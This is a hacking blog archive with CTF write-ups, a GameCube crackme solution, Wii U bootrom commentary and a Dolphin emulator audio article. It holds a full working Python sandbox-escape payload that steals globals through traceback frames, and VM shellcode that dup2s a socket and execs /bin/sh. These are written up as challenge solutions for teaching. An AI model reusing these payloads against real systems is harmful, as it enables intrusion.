2014
03.02

Been a while since I last took the time to solve a CTF challenge. I did not take part in the Boston Key Party CTF, but a friend of mine told me that I might be interested in this crackme.

hypercube.dol is a GameCube binary that computes a value using terribly unoptimized code. The goal of the challenge is to understand the code and “optimize” the slow parts. Kind of like the “supercomputer” category from PlaidCTF. I like crackmes and I like GameCube RE, so let’s get started!

First look

$ strings hypercube-5f456d4afe1cae8909b3ff9abba66c0a.dol | grep -i libogc
|libOGC Release 1.8.11

This GameCube binary is in DOL format (the main executable format for GameCube and Wii) and was built using the libogc homebrew library, and more precisely its latest release. The DOL is stripped, but using symbolizer from GiantPune’s WiiQt project we can easily get a .idc out of it:

$ ./symbolizer ../../hypercube-5f456d4afe1cae8909b3ff9abba66c0a.dol \
        /opt/devkitpro/libogc/lib/cube out.idc
Loading dol... 
Loading libs... 
matching data... 
 -- Round 0 / 10 -- 
 - added 106 new functions - 
 -- Round 1 / 10 -- 
 - added 16 new functions - 
 -- Round 2 / 10 -- 
 - added 4 new functions - 
 -- Round 3 / 10 -- 
no new functions found 3 
Total functions found: 310 
 -- Round 0 / 10  following branches -- 
 - added 70 new functions - 
 -- Round 1 / 10  following branches -- 
 - added 2 new functions - 
 -- Round 2 / 10  following branches -- 
 -- Round 0 / 10  following branches and global variables -- 
 - added 2 new functions - 
 -- Round 1 / 10  following branches and global variables -- 
Total global variables:  87 
Total data matches:      21 
Total functions found:   395 
Generating idc file... 

$ wc -l out.idc
858 out.idc

Looking at the code

Let’s start disassembling the thing now that we have a few symbols. For that, we use IDA and the very convenient DOL loader module created by HyperIris: IDA 6.1 version. Let’s look for __lwp_sysinit, since it is usually where the main function is used:

void __lwp_sysinit() {
  // ...
  __lwp_thread_start(_thr_main,(void*)__crtmain,NULL);
  // ...
}

From there, we determine that __crtmain is at 0x8000340C, and it then calls main at 0x80005BC4. We could have looked at string x-refs to determine the same thing, but we usually don’t get this luxury (and at this point we haven’t run the binary yet so we don’t know about main displaying some strings).

main has a loop that computes four different values (stored on the stack: 0x8(r31), 0xC(r31), 0x10(r31) and 0x14(r31), with r31 being the frame pointer). Let’s call these values a, b, c, d and look at how they’re initialized:

.text1:80005C2C                 li        r0, 0xADD
.text1:80005C30                 stw       r0, StackFrame.a(r31)
.text1:80005C34                 lis       r0, 5 # 0x5DD11
.text1:80005C38                 ori       r0, r0, 0xDD11 # 0x5DD11
.text1:80005C3C                 stw       r0, StackFrame.b(r31)
.text1:80005C40                 lis       r0, 0x35 # 0x352463
.text1:80005C44                 ori       r0, r0, 0x2463 # 0x352463
.text1:80005C48                 stw       r0, StackFrame.c(r31)
.text1:80005C4C                 lis       r0, 0x800 # 0x8008135
.text1:80005C50                 ori       r0, r0, 0x8135 # 0x8008135
.text1:80005C54                 stw       r0, StackFrame.d(r31)

We start with a = 0xADD, b = 0x5DD11, c = 0x352463 and d = 0x8008135. Now we need to look at the loop and what exactly it computes (then how we can make it faster):

The loop

First things first: how do we exit the loop. The relevant code is this:

.text1:80005C58 loop_entry:
.text1:80005C58                 li        r0, 0
.text1:80005C5C                 stw       r0, 0x18(r31)
.text1:80005C60                 b         loop_condition

.text1:80005D3C loop_condition:                         # CODE XREF: sub_80005BC4+9C
.text1:80005D3C                 lwz       r0, 0x18(r31)
.text1:80005D40                 cmpwi     cr7, r0, 0x7A9E
.text1:80005D44                 crnot     4*cr7+eq, 4*cr7+gt
.text1:80005D48                 mfcr      r0
.text1:80005D4C                 extrwi    r0, r0, 1,30
.text1:80005D50                 clrlwi    r0, r0, 24
.text1:80005D54                 cmpwi     cr7, r0, 0
.text1:80005D58                 bne       cr7, loop_body

This code is an horribly unoptimized way to have the following: an integer variable that goes from 0 to 0x7A9E (non inclusive). But what’s inside this loop?

.text1:80005C64 loop_body:                              # CODE XREF: sub_80005BC4+194
.text1:80005C64                 li        r0, 0
.text1:80005C68                 stw       r0, 0x1C(r31)
.text1:80005C6C                 b         inside_loop_condition

.text1:80005D10 inside_loop_condition:                  # CODE XREF: sub_80005BC4+A8
.text1:80005D10                 lwz       r0, 0x1C(r31)
.text1:80005D14                 cmpwi     cr7, r0, 0x15
.text1:80005D18                 crnot     4*cr7+eq, 4*cr7+gt
.text1:80005D1C                 mfcr      r0
.text1:80005D20                 extrwi    r0, r0, 1,30
.text1:80005D24                 clrlwi    r0, r0, 24
.text1:80005D28                 cmpwi     cr7, r0, 0
.text1:80005D2C                 bne       cr7, inside_loop_body

The exact same thing! A loop, which this times goes from 0 to 0x15. Now, the inner loop code is quite long, so I will directly skip to the pseudocode of the whole outer loop:

  for (u32 i = 0; i < 0x7A9E; ++i) {
    for (u32 j = 0; i < 0x15; ++j) {
      a = func1(b, c); // approximate
      b = func1(b, 0x6DDB); // approximate
      c = b ^ 0x1BA41C3C;
      d = func2(d);
    }
  }

The inner loop calls two functions: func1 (@ 0x80005B18) and func2 (@ 0x800059E4). func1's code calls func3 (@ 0x80005A4C), which itself calls func2. It looks like func2 is where it all ends up, let's start there.

func2 (@ 0x800059E4)

u32 func2(u32 x) {
  s32 y = 1;
  do {
    x -= 1;
    y += 1;
  } while (y != 0);
  return x;
}

Computes x - 0xFFFFFFFF, aka. x + 1. In a very, very slow way. We can replace the code of this function with the following code:

.text1:800059E4 func2:                                  # CODE XREF: sub_80005A4C+34
.text1:800059E4                                         # sub_80005A4C+78 ...
.text1:800059E4                 addic     r3, r3, 1
.text1:800059E8                 blr
.text1:800059E8 # End of function func2

func3 (@ 0x80005A4C)

When looking at the code of func3(x, y), we can notice it is doing ret = func2(ret); several times and contains two loops that seem to depend on the values of the arguments: x and y. Let's make an educated guess: func3(x, y) -> x + y:

.text1:80005A4C func3:                                  # CODE XREF: func1+58
.text1:80005A4C                 add       r3, r3, r4
.text1:80005A50                 blr

func1 (@ 0x0x80005B18)

func1(x, y) adds something in a loop to the output value. Another educated guess: func1(x, y) -> x * y:

.text1:80005B18 func1:                                  # CODE XREF: sub_80005BC4+B4
.text1:80005B18                                         # sub_80005BC4+F0
.text1:80005B18                 mullw     r3, r3, r4
.text1:80005B1C                 blr

Result

We can now running the code, and with the only loops remaining being the two loops in main, we instantly get the result:

key{1337812927326272294680194969380h4x134941407}
2014
02.24

Two well known media-whores from the console warez scene recently revealed via posts on several websites (wiiuhax for example) that they got hold of the plaintext of the Wii U Espresso Bootrom. Because these people have no idea about console hacking and are just good/bad at overhyping things they don’t understand and didn’t write in the first place (props to Maxternal & MarioNum1 for the work on implementing fail0verflow’s exploit revealed back in December), I thought I would write a quick article about what having an Espresso Bootrom dump does.

TL;DR: Nothing. It’s just a first step towards potentially implementing a more complex exploit that allows getting PowerPC ancast decryption keys. In itself it is completely useless.

The Espresso bootrom

This bootrom which was dumped is the first code that runs on the Wii U PowerPC “Espresso” CPU. Its role is to check the signature of a PowerPC binary, decrypt it, lock access to decryption keys and bootrom code, then run it. It is a new security measure that did not exist on the Wii “Broadway” CPU, which simply ran unsigned binaries.

In practice, this bootrom is useless because of a stupid TOCTTOU vulnerability. It is possible to run any unsigned code on the Espresso, and this was disclosed by fail0verflow back in May 2013. Getting the bootrom plaintext does not provide any more information towards that since it is already broken.

On top of that, fail0verflow described in great details how the bootrom works internally in their talk at 30c3. Getting the plaintext of the bootrom is not really any help there since you could just read the slides and know everything it does. The only useful information that was not (as far as I know) provided is the location of the keys (SPRs/MMIO addresses?), but since the bootrom lock access to keys after it has run, this is not useful information in itself.

So what does it provide?

For the developers working on this hacking project: a step forward that allows them to implement the more interesting HRESET race attack. This attack was also described by fail0verflow in their 30c3 talk and allows corrupting the internal state of the CPU using short hardware reset pulses. It is way more difficult to implement than the basic SRESET race used to get a bootrom dump so at the current speed I wouldn’t expect anything new in that area for a few weeks/a month.

For users, pirates, etc.: nothing. While this small step was overhyped by media-whores using fake images of Wii U GamePads with cool pictures on them, it does not provide any more access to the console than was previously possible. The only new useful information from that dump is the location of the keys, which is not useful by itself. It is far from being “one giant leap for the wii-u scene” as announced. Don’t trust stupid people.

Update: marcan’s take on this

marcan from fail0verflow was the first person to implement this exploit a year ago and disclosed it at 30c3 2 months ago. His take on it:

It serves precisely three purposes:

1. It paves the way for a different exploit which, while ALSO not breaking anything not broken, and ALSO being useless for homebrew/piracy, makes it slightly easier to analyze the rest of the system once you do break it using yet another completely unrelated exploit.
2. It’s cute and cool. We’re hackers, we like breaking things even if it’s useless. We also like laughing at Nintendo because they clearly didn’t intend for this to happen, even though it’s rendered moot by other flaws in the system.
3. Unfortunately, it also gives harryoke an excuse to post more utter nonsense and a completely fake gamepad photo that has nothing to do with any of this.

In other words, it allows MarioNumber1 to say he dumped the boot rom (good job!), and if he implements the HRESET exploit, and if he implements an undisclosed, completely unrelated, much more complex Wii U mode exploit, then he will have a slightly easier/more convenient time reverse engineering the rest of the system. It’s not even a make-or-break thing, just a slight convenience.

Really, we did it because number 2.

And yes, Nintendo can’t fix this on existing consoles, but even if they fix it on newer ones it’s completely fucking irrelevant because only a single person in the world has to use this exploit once, ever, and after that it’s completely and utterly useless for every purpose, period. The only purpose of this exploit is to learn more about how the console works.

2013
07.10

Since the release of Dolphin 3.5 half a year ago, audio processing in Dolphin has changed a lot. In Dolphin versions up to 3.5, a lot of games required low-level emulation of the DSP code in order to not crash or get audio output. This low-level emulation (called DSP LLE) is unfortunately a lot slower than high-level emulation (DSP HLE): while low-level emulation emulates extremely accurately the DSP code by translating the binary code into x86, high-level emulation simply runs C++ code which approximates what the DSP code does. I’ve spent several months rewriting most of the DSP HLE code, fixing sound issues in several dozens of games (my current estimate is around ~150), and now DSP HLE can be used in most GameCube and Wii games that previously required DSP LLE. HLE being a lot faster than LLE, everyone should be happy, right?

Wrong. It turns out that one of the main source of bugs, crashes and inaccuracies in DSP HLE was also one of its main features: the ability to run sound emulation at full speed even if the emulated game is not able to reach 100% speed on a computer. This feature, called asynchronous audio processing, is obviously being requested again by more and more people. This article is here to explain why async audio will not come back and what async audio actually breaks.

I’ll only talk about the GameCube audio emulation in this article in order to make things easier – but DSP HLE on GC and Wii is extremely similar, and most of the implementation is shared for these two consoles. I will also only talk about AX HLE, which is emulation for the most used (99.9% of games) DSP program.

What are the differences between sync and async audio emulation?

The audio processing code in a GameCube runs on the DSP, which is a second processor engineered to be fast at tasks like audio mixing. The DSP communicates with the CPU running a game in three ways: a pair of registers used to pass very small messages, DMA in order to read and write from/to RAM, and an IRQ in order for the DSP to interrupt the CPU.

Through these communication methods, every 5ms, the CPU sends to the DSP a list of data blocks about sounds to process. Each of these blocks contain information like “location of the sound data in memory”, “volume”, “looping or oneshot”. The CPU also sends a list of commands to run – the DSP code supports about 18 of these commands. When the DSP is done running the commands, it sends an interrupt to the CPU to signal that it is done. The CPU then updates the sound data blocks, copies the mixed sound samples that were sent to RAM by the DSP, and a few other things.

What these sound data blocks look like.

What these sound data blocks look like.

What synchronous audio emulation does is very simple: when the DSP needs to run (there are commands waiting to be executed), stop the CPU, execute all the commands, and send an interrupt to signal we are done. Exactly what should be done, which is the reason why I went that way when I reimplemented the DSP high-level emulation.

What asynchronous audio emulation does is a bit more complicated: when the DSP gets commands, it completely ignores the commands and just copies the list of data blocks. It then sends an interrupt to signal that it’s done. In the background, it will use these data blocks to mix audio and send it directly to the audio output backend of the emulator, bypassing most of the standard audio processing path. If the emulated CPU tries to read the sound data that the DSP was supposed to copy to RAM, it will read garbage. But because the data blocks processing is not tied to the CPU sending us commands, it doesn’t care about the emulated CPU speed and can just run at 660full speed all the time.

On the left, asynchronous audio emulation. On the right, synchronous audio emulation.

On the left, asynchronous audio emulation. On the right, synchronous audio emulation.

If this doesn’t sound wrong enough to you, let’s take a few examples of why this actually does not work in practice.

AUX processing

AUX processing is a feature of the DSP program that allows the CPU to apply audio effects on the sounds. It is implemented using DSP commands to download and upload data to the CPU in order for the CPU to process it while the DSP is working on something else. AUX is used for several very common audio effects: echo, reverb, chorus, …

This simply cannot work with asynchronous audio processing: first of all, the DSP<->CPU communication is obviously impossible (they don’t run in sync anymore), but also all of the AUX code is implemented to handle a fixed number of samples, which matches how much samples the DSP handles at a time (32×5, for 5ms at 32KHz). Let’s compare how some games sound like with and without AUX effects applied:

Without AUX processing

With AUX processing

I think the music speaks by itself.

Games requiring tight timing

This issue with asynchronous audio processing is actually what made me start rewrite the DSP emulation code in Dolphin (see this commit from November 2012). Basically, as the DSP is engineered to handle 5ms of sound at a time, game developers use this in order to time when sounds should start and stop in order to make music from small samples of instruments. But a 5ms accuracy is often not enough: for that, the DSP provides a feature called “sub-5ms updates”, with which you can specify some slight changes to be made on the sound data blocks for each millisecond.

Fail to emulate that properly, and games become confused when the changes they requested the DSP to make are not done. It sounds about like this (should be the same music as above):

Games using the sound processing status to trigger events

This is a bug that is not fixed yet because it mostly impacts games using another DSP program (called the “Zelda” program, because it’s mostly used by Zelda games). Basically, some games wait for sounds to be completed before triggering an event. When the sound processing is done asynchronously, the game might miss the moment when the sound has finished playing (because it went too fast compared to the emulated CPU speed) and just freeze. Or it might not notice that it needs to start a new music track, and the music completely stops, leaving you in a mostly silent world.

Once again: there is no way to fix that with asynchronous audio processing, this is a direct consequence of how it works.

Conclusion

A lot of people are still requesting asynchronous audio processing in Dolphin because their computer is too slow to emulate games at full speed. They assume that developers are being lazy by not implementing what they think is best. The truth is: asynchronous audio processing causes way too much problems to be worth spending our time on. It’s not easy to implement it besides the current audio emulation code either, and some features simply can’t work with it (Wiimote sound on the Wii, for example). I hope this article will help explain why asynchronous audio emulation is broken and why we don’t want it in our emulator anymore.

2013
03.10

The Nuit du Hack CTF 2013 Quals round was taking place yesterday. As usual, I’ll be posting a few writeups about fun exercises and/or solutions from this CTF. If you want more, my teammate w4kfu should be posting some writeups as well on his blog soon.

TL;DR:

auth(''.__class__.__class__('haxx2',(),{'__getitem__':
lambda self,*a:'','__len__':(lambda l:l('function')( l('code')(
1,1,6,67,'d\x01\x00i\x00\x00i\x00\x00d\x02\x00d\x08\x00h\x02\x00'
'd\x03\x00\x84\x00\x00d\x04\x006d\x05\x00\x84\x00\x00d\x06\x006\x83'
'\x03\x00\x83\x00\x00\x04i\x01\x00\x02i\x02\x00\x83\x00\x00\x01z\n'
'\x00d\x07\x00\x82\x01\x00Wd\x00\x00QXd\x00\x00S',(None,'','haxx',
l('code')(1,1,1,83,'d\x00\x00S',(None,),('None',),('self',),'stdin',
'enter-lam',1,''),'__enter__',l('code')(1,2,3,87,'d\x00\x00\x84\x00'
'\x00d\x01\x00\x84\x00\x00\x83\x01\x00|\x01\x00d\x02\x00\x19i\x00'
'\x00i\x01\x00i\x01\x00i\x02\x00\x83\x01\x00S',(l('code')(1,1,14,83,
'|\x00\x00d\x00\x00\x83\x01\x00|\x00\x00d\x01\x00\x83\x01\x00d\x02'
'\x00d\x02\x00d\x02\x00d\x03\x00d\x04\x00d\n\x00d\x0b\x00d\x0c\x00d'
'\x06\x00d\x07\x00d\x02\x00d\x08\x00\x83\x0c\x00h\x00\x00\x83\x02'
'\x00S',('function','code',1,67,'|\x00\x00GHd\x00\x00S','s','stdin',
'f','',None,(None,),(),('s',)),('None',),('l',),'stdin','exit2-lam',
1,''),l('code')(1,3,4,83,'g\x00\x00\x04}\x01\x00d\x01\x00i\x00\x00i'
'\x01\x00d\x00\x00\x19i\x02\x00\x83\x00\x00D]!\x00}\x02\x00|\x02'
'\x00i\x03\x00|\x00\x00j\x02\x00o\x0b\x00\x01|\x01\x00|\x02\x00\x12'
'q\x1b\x00\x01q\x1b\x00~\x01\x00d\x00\x00\x19S',(0, ()),('__class__',
'__bases__','__subclasses__','__name__'),('n','_[1]','x'),'stdin',
'locator',1,''),2),('tb_frame','f_back','f_globals'),('self','a'),
'stdin','exit-lam',1,''),'__exit__',42,()),('__class__','__exit__',
'__enter__'),('self',),'stdin','f',1,''),{}))(lambda n:[x for x in
().__class__.__bases__[0].__subclasses__() if x.__name__ == n][0])})())

One of the exercises, called “Meow”, gave us a remote restricted Python shell with most builtins disabled:

{'int': <type 'int'>, 'dir': <built-in function dir>,
'repr': <built-in function repr>, 'len': <built-in function len>,
'help': <function help at 0x2920488>}

A few functions were available, namely kitty() displaying an ASCII cat, and auth(password). I assumed our goal was to bypass the authentication or to find the password. Unfortunately, our Python commands are passed to eval in expression mode, which means we can’t use any Python statement: no assignment, no print, no function/class definitions, etc. This makes things a lot harder to work with. We’ll have to use some Python magic (this writeup will be full of it, I promise).

I first assumed auth was simply comparing the password to a constant string. In this case, I could use a custom object with __eq__ overwritten to always return True. However, there is no trivial way to craft that object: we can’t define our own classes using the class Foo: syntax, we can’t modify an already existing object (no assignment), etc. This is where our first bit of Python magic comes into place: we can directly instantiate a type object to create a class object, then instantiate this class object. Here is how you would do it:

type('MyClass', (), {'__eq__': lambda self: True})

However, we can’t use type here: it is not defined in our builtins. We can use a second trick: every Python object has a __class__ attribute, which gives us the type of an object. For example, ''.__class__ is str. But more interesting: str.__class__ is type! Which means we can use ''.__class__.__class__ to instantiate our new type.

Unfortunately, the auth function is not simply comparing our object to a string. It’s doing a lot of other things to it: slicing it to 14 characters, taking its length via len() and calling reduce with a strange lambda as well. Without the code it’s going to be hard to guess how to make an object that behaves exactly like the function wants, and I don’t like guessing. We need more magic!

Enter code objects. Python functions are actually objects which are made of a code object and a capture of their global variables. A code object contains the bytecode of that function, as well as the constant objects it refers to, some strings and names, and other metadata (number of arguments, number of locals, stack size, mapping from bytecode to line number). You can get the code object of a function using myfunc.func_code. This is forbidden in the restricted mode of the Python interpreter, so we can’t see the code of the auth function. However, we can craft our own functions like we crafted our own types!

You might wonder: why do we need to use code objects to craft functions when we already have lambda? Simple: lambdas cannot contain statements. Random crafted functions can! For example, we can create a function that prints its argument to stdout:

ftype = type(lambda: None)
ctype = type((lambda: None).func_code)
f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,),
                (), ('s',), 'stdin', 'f', 1, ''), {})
f(42)
# Outputs 42

There is a slight problem with this though: to get the type of a code object, we need to access the func_code attribute, which is restricted. Fortunately, we can use even more Python magic to find our type without accessing forbidden attributes.

In Python, a type object has a __bases__ attribute which returns the list of all its base classes. It also has a __subclasses__ method that returns the list of all types that inherit from it. If we use __bases__ on a random type, we can reach the top of the type hierarchy (object type), then read the subclasses of object to get a list of all types defined in the interpreter:

>>> len(().__class__.__bases__[0].__subclasses__())
81

We can then use this list to find our function and code types:

>>> [x for x in ().__class__.__bases__[0].__subclasses__()
...  if x.__name__ == 'function'][0]
<type 'function'>
>>> [x for x in ().__class__.__bases__[0].__subclasses__()
...  if x.__name__ == 'code'][0]
<type 'code'>

Now that we can build any function we want, what can we do? We can’t directly access the non restricted builtins: the functions we craft are still executed in the restricted environment. We can get a non sandboxed function to call us: the auth function call the __len__ method of the object that we pass as a parameter. This is however not enough to get out of the sandbox: our globals are still the same and we can’t for example import a module. I tried to look at all the classes we could access via the __subclasses__ trick to see if we could get a reference to a useful module through there, but no dice. Even getting Twisted to call one of our crafted functions via the reactor was not enough. We could try to get a traceback object and use it to browse the stack frames of our callers, but the only trivial ways to get a traceback object are via the inspect or the sys modules which we can’t import. After being blocked on that problem, I went to work on other problems, slept a lot, and woke up to the solution I needed!

There actually is another way to get a traceback object in Python without using the standard library: context managers. They are a new feature of Python 2.6 which allow some kind of object life scoping in Python:

class CtxMan:
    def __enter__(self):
        print 'Enter'
    def __exit__(self, exc_type, exc_val, exc_tb):
        print 'Exit:', exc_type, exc_val, exc_tb

with CtxMan():
    print 'Inside'
    error

# Output:
# Enter
# Inside
# Exit: <type 'exceptions.NameError'> name 'error' is not defined
        <traceback object at 0x7f1a46ac66c8>

We can create a context manager object which will use the traceback object passed to __exit__ to display the global variables of our caller, caller which is out of the restricted environment. To do that, we use a combination of all our previous tricks. We create an anonymous type defining __enter__ as a simple lambda and __exit__ as a lambda that accesses what we want in the traceback and passes it to our print lambda (remember, we can’t use statements):

''.__class__.__class__('haxx', (),
  {'__enter__': lambda self: None,
   '__exit__': lambda self, *a:
     (lambda l: l('function')(l('code')(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S',
                                        (None,), (), ('s',), 'stdin', 'f',
                                        1, ''), {})
     )(lambda n: [x for x in ().__class__.__bases__[0].__subclasses__()
                    if x.__name__ == n][0])
     (a[2].tb_frame.f_back.f_back.f_globals)})()

We need to go deeper! Now, we need to use this context manager (that we will call ctx in our next code snippets) in a function that will purposefully raise an error in a with block:

def f(self):
    with ctx:
        raise 42

And we put f as the __len__ of our crafted object that we pass to the auth function:

auth(''.__class__.__class__('haxx2', (), {
  '__getitem__': lambda *a: '',
  '__len__': f
})())

Refer to the beginning of the article for the “real” inlined code. When ran on the server, this causes the Python interpreter to run our f function, go through the crafted context manager __exit__, which will access the globals from our caller, which contain these two interesting values:

'FLAG2': 'ICanHazUrFl4g', 'FLAG1': 'Int3rnEt1sm4de0fc47'

Two flags?! Turns out that the same service was used for two successive exercises. Double kill!

For more fun, by accessing the globals we can do more than simply reading: we can also modify the flags! Using f_globals.update({ 'FLAG1': 'lol', 'FLAG2': 'nope' }) the flags are changed until the next server restart. This was apparently not planned by the organizers.

Anyway, I still don’t know how we were supposed to solve this challenge normally, but I think this “generic” solution is a good way to introduce people to some nice Python black magic 🙂 Use it carefully, it’s easy to get Python to segfault using crafted code objects (exploiting the Python interpreter and running an x86 shellcode via crafted Python bytecode will be left as an exercise for the reader). Thanks to the Nuit du Hack organizers for this nice exercise.

2013
02.17

MysteryBox was a remote server disassembling and running its input data for an unknown RISC-like CPU. As far as I know the unknown CPU is not a “real” CPU but a VM made solely for this challenge. Here is an example of how to interact with the remote MysteryBox service:

$ perl -e 'print "\x00\x00\x00\x00"' | 
        nc mysterybox.2013.ghostintheshellcode.com 4242
09007800  ldb sp, sp, sp
Caught signal 11.  Program terminated.
 sp=0900bc08  r1=00000000  r2=00000000  r3=00000000  r4=00000000  r5=00000000
 r6=00000000  r7=00000000  r8=00000000  r9=00000000 r10=00000000 r11=00000000
r12=00000000 r13=00000000 r14=00000000 r15=00000000 r16=00000000 r17=00000000
r18=00000000 r19=00000000 r20=00000000 r21=00000000 r22=00000000 r23=00000000
r24=00000000 r25=00000000 r26=00000000 r27=00000000 r28=00000000 r29=00000000
 lr=00000000  ip=09007800  cc=ffff

We can see the remote service disassembled our 00 00 00 00 bytes to ldb sp, sp, sp and crashed while executing it (crash dump ip points to our instruction). After playing a bit with the disassembler, I figured out how instructions were encoded, and ran a loop to get all the instructions supported by this CPU:

00000000        ldb sp, sp, sp
01000000        stb sp, sp, sp
02000000        ldbu sp, sp, sp
03000000        stbu sp, sp, sp
04000000        ldsxb sp, sp, sp
05000000        ldi sp, 0
06000000        add sp, sp, sp
07000000        mulx sp, sp, sp, sp
08000000        div sp, sp, sp
09000000        and sp, sp, sp
0a000000        shl sp, sp, sp
0b000000        syscall 0  ; SYS_restart_syscall
0c000000        ldfs f0, sp, sp
0d000000        ldfsu f0, sp, sp
0e000000        fadd f0, f0, f0
0f000000        fmod f0, f0, f0
00400000        ldh sp, sp, sp
01400000        sth sp, sp, sp
02400000        ldhu sp, sp, sp
03400000        sthu sp, sp, sp
04400000        ldsxh sp, sp, sp
05400000        ldih sp, 0
06400000        sub sp, sp, sp
07400000        imulx sp, sp, sp, sp
08400000        idiv sp, sp, sp
09400000        or sp, sp, sp
0a400000        shr sp, sp, sp
0b400000        cmplt0 sp, sp
0c400000        ldfd f0, sp, sp
0d400000        ldfdu f0, sp, sp
0e400000        fsub f0, f0, f0
0f400000        fpow f0, f0, f0
00800000        ldw sp, sp, sp
01800000        stw sp, sp, sp
02800000        ldwu sp, sp, sp
03800000        stwu sp, sp, sp
04800000        ldsxbu sp, sp, sp
05800000        jmp 0x08a3b898
06800000        addx sp, sp, sp
07800000        mul sp, sp, sp
08800000        mod sp, sp, sp
09800000        xor sp, sp, sp
0a800000        rol sp, sp, sp
0b800000        icmplt0 sp, sp
0c800000        stfs f0, sp, sp
0d800000        stfsu f0, sp, sp
0e800000        fmul f0, f0, f0
0f800000        flog f0, f0, f0
00c00000        ldmw sp, sp, sp
01c00000        stmw sp, sp, sp
02c00000        ldmwu sp, sp, sp
03c00000        stmwu sp, sp, sp
04c00000        ldsxhu sp, sp, sp
05c00000        call 0x08a3b8d8
06c00000        subx sp, sp, sp
07c00000        mov sp, sp
08c00000        imod sp, sp, sp
09c00000        sar sp, sp, sp
0ac00000        ror sp, sp, sp
0bc00000        fcmplt0 f0, f0
0cc00000        stfd f0, sp, sp
0dc00000        stfdu f0, sp, sp
0ec00000        fdiv f0, f0, f0
0fc00000        ldfi f0, sp

More details about this architecture: it is little-endian, each instruction can be made conditional (like ARM) and the result of an arithmetic operation can be shifted left by up to 16 bits. While most instructions use 3 registers, some also use one register and a 16 bit, sign-extended immediate. From there, I started to experiment a bit and wrote a simple write(4, "h", 1) shellcode:

def gen_string(s):
    instrs = []
    for i, c in enumerate(s):
        c = ord(c)
        instrs.append(0x05020000 | i) # ldi r1, [i]
        instrs.append(0x05040000 | c) # ldi r2, 
        instrs.append(0x03040020)     # stbu r2, sp, r1
    return instrs

instrs = gen_string('h')
instrs += [
    0x05020004, # ldi r1, 4
    0x07c40000, # mov r2, sp
    0x05060001, # ldi r3, 1
    0x0b000004, # syscall SYS_write
]

This works well, however our goal is to get a shell! For that, we need to execve("/bin/sh", { "/bin/sh", NULL }, NULL). But this is not enough: sh tries to communicate using standard stdin/out/err FDs (0, 1, 2). We need to write something to dup2 our socket over these FDs:

def gen_string(s):
    instrs = []
    for i, c in enumerate(s):
        c = ord(c)
        instrs.append(0x05020000 | i) # ldi r1, [i]
        instrs.append(0x05040000 | c) # ldi r2, 
        instrs.append(0x03040020)     # stbu r2, sp, r1
    return instrs

def dup2(f, g):
    return [
        0x05020000 | f, # ldi r1, [f]
        0x05040000 | g, # ldi r2, [g]
        0x0b000000 | 63 # syscall SYS_dup2
    ]

instrs = []
instrs += dup2(4, 0)
instrs += dup2(4, 1)
instrs += dup2(4, 2)
instrs += gen_string('h')
instrs += [
    0x05020001, # ldi r1, STDOUT_FILENO
    0x07c40000, # mov r2, sp
    0x05060001, # ldi r3, 1
    0x0b000004, # syscall SYS_write
]

Our write syscall is now using STDOUT_FILENO (aka. 1) and working fine, which means our dup2 calls are working. Now we need to execve our shell. This shellcode stores "/bin/sh" at address sp+16, and stores argv (aka. { sp+16, 0 }) at address sp. Note that the previous gen_string had a bug because it was using stbu (store then update the pointer) instead of stb (simply store).

def gen_string(s):
    instrs = []
    for i, c in enumerate(s):
        c = ord(c)
        instrs.append(0x05020000 | (i + 16)) # ldi r1, [i+16]
        instrs.append(0x05040000 | c) # ldi r2, 
        instrs.append(0x01040020)     # stb r2, sp, r1
    return instrs

def dup2(f, g):
    return [
        0x05020000 | f, # ldi r1, [f]
        0x05040000 | g, # ldi r2, [g]
        0x0b000000 | 63 # syscall SYS_dup2
    ]

instrs = []
instrs += dup2(4, 0)
instrs += dup2(4, 1)
instrs += dup2(4, 2)
instrs += gen_string('/bin/sh\x00')
instrs += [
    0x05020010, # ldi r1, 16
    0x06021000, # add r1, r1, sp
    0x05040004, # ldi r2, 4
    0x06042000, # add r2, r2, sp
    0x01863040, # stw r3, r3, r2
    0x07c40000, # mov r2, sp
    0x01823040, # stw r1, r3, r2
    0x0b00000b, # syscall SYS_execve
]

With our shell we can now cat key to finally solve this challenge.

2013
02.17

GITS 2013 Writeup: RTFM (re100)

rtfm-67cc5dcb69df4244bcf2d573481e6d6a06b861a3: ELF 32-bit LSB executable
rtfm-e24f03bb1204f8e3d40fae8ac135187a11b0ba5c: data

rtfm is a binary processing ASCII input files and outputting seemingly compressed versions of these files: testing on a few long text files shows that the size of the output file is smaller than the input file. The second file from this challenge is a file compressed by rtfm, our objective is to write the decompression code for the rtfm compression.

The interesting part of the binary is the function at 0x08048910, which compresses the contents of an input buffer and writes it to a calloc-ed output buffer. For each character of the input stream, the function will read data from a 128 entries table at 0x08048CA0. Each of these entry contains a 16-bit word as well as an 8-bit integer.

After reading the details of the compression algorithm and noticing how it outputs a bit stream with variable size depending on the input character, I guessed that this was most likely implementing the well known Huffman encoding algorithm. The table at 0x08048CA0 is a hardcoded mapping of input symbols to output symbols, and the output symbols seem to be unambiguous when reading the compressed stream bit by bit. From this information we can now write a simple Huffman decoder using the same table.

import struct

fp = open('bin')
fp.seek(0xca0)
descr_raw = fp.read(4 * 128)
descr = {}

for i in xrange(0, 4*128, 4):
    s = descr_raw[i:i+3]
    w, b = struct.unpack('<HB', s)
    descr[i/4] = { 'byte': b, 'word': w }

def bits(s):
    for c in s:
        n = ord(c)
        for i in xrange(8):
            yield (n & 0x80) >> 7
            n <<= 1

def decompress(buf):
    buf = buf[4:]

    ends = {}
    for i, d in enumerate(descr.values()):
        n = d['byte'] + 2
        s = bin(d['word'])[2:]
        s += ("0" * (n - len(s)))
        ends[s] = i

    out = []
    n = ""
    for i, b in enumerate(bits(buf)):
        n += str(b)
        if n in ends:
            out.append(chr(ends[n]))
            n = ""

    return ''.join(out)

if __name__ == '__main__':
    print decompress(
        open('rtfm-e24f03bb1204f8e3d40fae8ac135187a11b0ba5c').read()
    )

Decompressing the file gives us a RTF document, which contains the key: “Did I have Vari-good-code?”.

2013
02.17
hackthegibson: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), 
    dynamically linked (uses shared libs), for GNU/Linux 2.6.15,
    BuildID[sha1]=0xb8515e4280130d84d4b4e1fd492da1b099ec0eb6, stripped

hackthegibson is a 64-bit ELF for Linux using OpenSSL (libcrypto) and FFTW to analyze the spectrum of samples coming from /dev/dsp.

